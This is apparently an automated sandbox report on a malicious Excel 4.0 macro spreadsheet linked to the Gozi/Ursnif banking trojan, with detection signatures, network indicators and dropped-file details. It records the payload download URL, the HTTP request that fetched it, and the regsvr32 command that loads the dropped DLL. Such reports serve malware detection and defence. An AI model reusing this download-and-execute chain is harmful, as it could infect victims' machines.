Loading ...

Play interactive tourEdit tour

Analysis Report document-148570644.xls

Overview

General Information

Sample Name:document-148570644.xls
Analysis ID:324304
MD5:11aaacbcd509c8956e703db1b045e831
SHA1:bf1eab2dfeb84b2153857c51deb2549ba747a8e9
SHA256:f7e36187c4d6447fb6c53506d996fd943027c1cf99c54e7300c6ac086a30a4f3
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2336 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-148570644.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-148570644.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2404, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2336

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-148570644.xlsVirustotal: Detection: 37%Perma Link
    Source: document-148570644.xlsMetadefender: Detection: 13%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: global trafficDNS query: name: fcco1936.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.253.218.120:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.253.218.120:80
    Source: Joe Sandbox ViewIP Address: 185.253.218.120 185.253.218.120
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fcco1936.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fcco1936.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: fcco1936.com
    Source: document-148570644.xlsString found in binary or memory: http://fcco1936.com/ds/231120.gif
    Source: regsvr32.exe, 00000003.00000002.2107886342.0000000001CB0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Source: Screenshot number: 8Screenshot OCR: Enable Content X I J15 " "," jR " A B C D E F G H I K L M N O P Q R S T Y 301 302 303 304
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-148570644.xlsInitial sample: CALL
    Source: document-148570644.xlsInitial sample: CALL
    Source: document-148570644.xlsInitial sample: CALL
    Source: document-148570644.xlsInitial sample: CALL
    Source: document-148570644.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-148570644.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-148570644.xlsOLE indicator, VBA macros: true
    Source: document-148570644.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\27DE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD7B.tmpJump to behavior
    Source: document-148570644.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: document-148570644.xlsVirustotal: Detection: 37%
    Source: document-148570644.xlsMetadefender: Detection: 13%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-148570644.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-148570644.xls37%VirustotalBrowse
    document-148570644.xls16%MetadefenderBrowse
    document-148570644.xls8%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    fcco1936.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://fcco1936.com/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fcco1936.com
    185.253.218.120
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://fcco1936.com/ds/231120.giffalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2107886342.0000000001CB0000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    185.253.218.120
    unknownUkraine
    202302NETH-ASUAfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:324304
    Start date:29.11.2020
    Start time:04:48:20
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 22s
    Hypervisor based Inspection enabled:false
    Report type:light
    Sample file name:document-148570644.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLS@3/5@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    185.253.218.120document-1477931596.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1477931596.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1559468852.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1559468852.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1543123111.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1558228811.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1543123111.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1558228811.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1545621675.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1545621675.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1538761220.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1570163542.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1570163542.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1528081469.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1547667720.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1547667720.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1560478486.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1560478486.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1529051733.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif
    document-1529051733.xlsGet hashmaliciousBrowse
    • fcco1936.com/ds/231120.gif

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    fcco1936.comdocument-1477931596.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1477931596.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    NETH-ASUAdocument-1477931596.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1477931596.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1559468852.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1543123111.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1558228811.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1545621675.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1538761220.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1570163542.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1528081469.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1547667720.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120
    document-1560478486.xlsGet hashmaliciousBrowse
    • 185.253.218.120

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\75DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):315286
    Entropy (8bit):7.9856413591280395
    Encrypted:false
    SSDEEP:6144:6bEarFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Mx:6DFPM8R3AsB+bjej/9ce
    MD5:D824A3101A2BC35D584FDECAD9923DDD
    SHA1:BE6E50EBE12085524DBEAC8D8169F6F558222B61
    SHA-256:6549E153F5D53FD8356E9006155008D45DEA762DD3A070937FB847714A849763
    SHA-512:AD5F46B19F3A65E49A18ED415633A82C159407580E5EA336FA8D5EA14826280A16D9CFDE0D3B8BB8F60ECDACB28AE1A3F570CCEF8E2D9F7D0BDFFC9C5AACE1D2
    Malicious:false
    Reputation:low
    Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 11:48:40 2020, atime=Sun Nov 29 11:48:40 2020, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.473798836841698
    Encrypted:false
    SSDEEP:12:85QKbCLgXg/XAlCPCHaX7B8NB/+GRUX+WnicvbbbDtZ3YilMMEpxRljKPTdJP9TK:85DbU/XTr6NkPYebDv3q2rNru/
    MD5:05139C31680122D6CEBF7EBC86D4EE54
    SHA1:EA0AC70B49B69F2CD97EA3A8E9A86225C177F0AC
    SHA-256:EC05901552B50663C7079F83A760F7DE2874A1E51404F777CA819066B37CDFDC
    SHA-512:7FF1CF33325EB4F2F3E1A036B03D985049DE49B84977BCFCC63A435C79670FBB1D2DDCFA2ADE42129D65F263964310BE0A56FC9D97264004D9EAAAFF1983AC28
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G....r.M.....r.M.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q.f..Desktop.d......QK.X}Q.f*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-148570644.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Sun Nov 29 11:48:40 2020, atime=Sun Nov 29 11:48:40 2020, length=338432, window=hide
    Category:dropped
    Size (bytes):4216
    Entropy (8bit):4.538313508472774
    Encrypted:false
    SSDEEP:96:8X+/X6NnL/2Qh2X+/X6NnL/2Qh2X+/X6NnL/2Qh2X+/X6NnL/2Q/:8ZNn6QEZNn6QEZNn6QEZNn6Q/
    MD5:E1AC52745418910F8093D534342D40E1
    SHA1:46D43B5D3A18FEA6B93D3FADEB9BA5C48A46F27A
    SHA-256:A50F4CA78184E6C3986FA2A2561BA687D9150AEFF501ECDEFE9629A53008E0AA
    SHA-512:249999EC13FDD9BB59DD2451BBC78DCD6C90365035DA9D0F38AD9175977E8462CFE490EB6BBE91D9050ABCDC30017F87546A9E1BB3864FD722D2456E4EB21F43
    Malicious:false
    Reputation:low
    Preview: L..................F.... ......{....r.M...5.z.M....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..,..}Q.f .DOCUME~1.XLS..Z.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.8.5.7.0.6.4.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop\document-148570644.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.8.5.7.0.6.4.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W..
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):225
    Entropy (8bit):4.753082994316316
    Encrypted:false
    SSDEEP:6:dj6Y9L3PtjSEL3Ptj6Y9L3PtjSEL3Ptj6Y9L3PtjSEL3Ptj6Y9L3Ptjy:dmyxmyxmyxmy2
    MD5:6C09CEEF4BA3E01EFCC04A784F6B8255
    SHA1:74622332C0708A633EF09C216825A6B6B7A0BFD2
    SHA-256:1D23332F5BEF5C749206AD523F63D7D699FD333145B8B5BD87DE192C1418DA3B
    SHA-512:AD7EC6AC33E43F9CC48057FE8154909385DDA9C1823C5DE053157CC49D3DC1E189A1F2D4F3C71226E2AFC735831DA40E6F8C7E491A10A67DB8D73668596B96F7
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[xls]..document-148570644.LNK=0..document-148570644.LNK=0..[xls]..document-148570644.LNK=0..document-148570644.LNK=0..[xls]..document-148570644.LNK=0..document-148570644.LNK=0..[xls]..document-148570644.LNK=0..
    C:\Users\user\Desktop\27DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Applesoft BASIC program data, first line number 16
    Category:dropped
    Size (bytes):398101
    Entropy (8bit):7.196747132545027
    Encrypted:false
    SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdV:Cizo8RnsIROnr6n75Y37
    MD5:EA8179784A074B1C58F0FFE136F7E922
    SHA1:F5B6AEEF00F9C5F206AFDAF9B80B6EAEE41A05C0
    SHA-256:E3AFB0AD588C8D59F55E1899B32A146F0C6F69612243C648492A36B2948B04E9
    SHA-512:F5D0268C92B243ED4E174D322CBE0F370578CE3CA24F70EC128C05F0D9DC9B0A595407F30465E6ABE04B979441C7E5A5D963496963BEB5D0E18FBBEE5B95D955
    Malicious:false
    Reputation:low
